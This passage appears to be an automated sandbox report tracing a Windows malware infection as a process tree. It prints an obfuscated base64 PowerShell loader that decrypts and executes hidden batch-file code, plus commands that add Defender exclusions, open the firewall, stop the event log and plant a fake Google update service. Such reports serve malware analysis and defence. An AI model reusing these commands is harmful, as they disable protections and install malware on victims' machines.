d3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        Suspicious behavior: AddClipboardFormatListener
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3824
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5520
      - C:\Users\Admin\AppData\Local\Temp\RucwqKUI8Hyb.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RucwqKUI8Hyb.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:836
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        7⤵
        Checks computer location settings
        Drops startup file
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of AdjustPrivilegeToken
        
        PID:3084
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        8⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:2204
        
        C:\Users\Admin\AppData\Local\Temp\tmpF613.tmp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tmpF613.tmp.exe"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3672
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3672 -s 880
        9⤵
        Program crash
        
        PID:3648
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10432721121\SURG9Yv.cmd"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2516
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10432721121\SURG9Yv.cmd"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3784
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:412
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5792
- - C:\Users\Admin\AppData\Local\Temp\10432730101\Yhihb8G.exe
    "C:\Users\Admin\AppData\Local\Temp\10432730101\Yhihb8G.exe"
    3⤵
    - Executes dropped EXE
    - Accesses Microsoft Outlook profiles
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - outlook_office_path
    - outlook_win_path
    PID:4360
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      Suspicious use of WriteProcessMemory
      PID:2772
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5808
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh wlan show profile
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:5092
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr All
        5⤵
        
        PID:3124
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4360 -s 2480
      4⤵
      Program crash
      PID:2224
- - C:\Users\Admin\AppData\Local\Temp\10432740101\9sWdA2p.exe
    "C:\Users\Admin\AppData\Local\Temp\10432740101\9sWdA2p.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:5428
- - C:\Users\Admin\AppData\Local\Temp\10432750101\P3Ow4LV.exe
    "C:\Users\Admin\AppData\Local\Temp\10432750101\P3Ow4LV.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    PID:2880
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5400
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:2376
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:1600
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:860
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:1200
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:4468
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:380
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:1920
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:3588
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:1748
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:2348
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:4520
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
      4⤵
      Launches sc.exe
      PID:2816
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:4300
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:5708
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
      4⤵
      Launches sc.exe
      PID:2804
- - C:\Users\Admin\AppData\Local\Temp\10432760101\88973ce112.exe
    "C:\Users\Admin\AppData\Local\Temp\10432760101\88973ce112.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:5960
  - - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
      "C:\Users\Admin\AppData\Local\Temp\10432760101\88973ce112.exe"
      4⤵
      Downloads MZ/PE file
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:5844
- - C:\Users\Admin\AppData\Local\Temp\10432770101\TbV75ZR.exe
    "C:\Users\Admin\AppData\Local\Temp\10432770101\TbV75ZR.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:4452
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:936
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:1672
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:1636
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:4020
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:5728
- - C:\Users\Admin\AppData\Local\Temp\10432780101\dojG16n.exe
    "C:\Users\Admin\AppData\Local\Temp\10432780101\dojG16n.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:2084
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:5448
- - C:\Users\Admin\AppData\Local\Temp\10432790101\7IIl2eE.exe
    "C:\Users\Admin\AppData\Local\Temp\10432790101\7IIl2eE.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:2296
  - - C:\Windows\SysWOW64\CMD.exe
      "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
      4⤵
      System Location Discovery: System Language Discovery
      PID:5868
- - C:\Users\Admin\AppData\Local\Temp\10432800101\UZPt0hR.exe
    "C:\Users\Admin\AppData\Local\Temp\10432800101\UZPt0hR.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: MapViewOfSection
    PID:5824
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
      4⤵
      PID:1316
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2444
  - - C:\Windows\system32\svchost.exe
      "C:\Windows\system32\svchost.exe"
      4⤵
      Downloads MZ/PE file
      Adds Run key to start application
      PID:3092
    - - C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        5⤵
        Executes dropped EXE
        
        PID:2164
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath C:\
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:6388
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Remove-MpPreference -ExclusionPath C:\
        6⤵
        
        PID:908
    - - C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        5⤵
        Deletes itself
        Executes dropped EXE
        
        PID:1076
      - C:\Users\Admin\AppData\Local\Temp\{35a781c3-05cb-428f-976e-96e92badaa63}\58b23bc9.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{35a781c3-05cb-428f-976e-96e92badaa63}\58b23bc9.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
        6⤵
        Checks for VirtualBox DLLs, possible anti-VM trick
        
        PID:2384
        
        C:\Users\Admin\AppData\Local\Temp\{bf19b991-db28-4a6c-82ac-2a317800622a}\1f52e62d.exe
        
        C:/Users/Admin/AppData/Local/Temp/{bf19b991-db28-4a6c-82ac-2a317800622a}/\1f52e62d.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
        7⤵
        Drops file in Drivers directory
        Sets service image path in registry
        Checks computer location settings
        Impair Defenses: Safe Mode Boot
        Loads dropped DLL
        Adds Run key to start application
        Writes to the Master Boot Record (MBR)
        Checks for VirtualBox DLLs, possible anti-VM trick
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:3756
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\{30d13f77-bf84-4b4a-b8f3-01a96a97b2f2}\f7950cf4-afce-4fa5-a046-b7a79fa2d2ab.cmd" "
        8⤵
        
        PID:6500
        
        C:\Windows\system32\reg.exe
        
        reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v f7950cf4-afce-4fa5-a046-b7a79fa2d2ab /f
        9⤵
        Modifies registry key
        
        PID:5696
- - C:\Users\Admin\AppData\Local\Temp\10432820101\e283363a52.exe
    "C:\Users\Admin\AppData\Local\Temp\10432820101\e283363a52.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    PID:3708
- - C:\Users\Admin\AppData\Local\Temp\10432830101\UZSECGPC.exe
    "C:\Users\Admin\AppData\Local\Temp\10432830101\UZSECGPC.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:960
  - - C:\Users\Admin\AppData\Local\Temp\{4FA6AD1B-0BB5-4EB9-ABC1-EEF60C458C1D}\UZSECGPC.exe
      C:\Users\Admin\AppData\Local\Temp\{4FA6AD1B-0BB5-4EB9-ABC1-EEF60C458C1D}\UZSECGPC.exe -package:"C:\Users\Admin\AppData\Local\Temp\10432830101\UZSECGPC.exe" -no_selfdeleter -IS_temp -media_path:"C:\Users\Admin\AppData\Local\Temp\{4FA6AD1B-0BB5-4EB9-ABC1-EEF60C458C1D}\Disk1\" -tempdisk1folder:"C:\Users\Admin\AppData\Local\Temp\{4FA6AD1B-0BB5-4EB9-ABC1-EEF60C458C1D}\" -IS_OriginalLauncher:"C:\Users\Admin\AppData\Local\Temp\{4FA6AD1B-0BB5-4EB9-ABC1-EEF60C458C1D}\Disk1\UZSECGPC.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:1604
    - - C:\Users\Admin\AppData\Local\Temp\{C673682E-EF0B-429D-B048-DE85DC06B631}\ISBEW64.exe
        
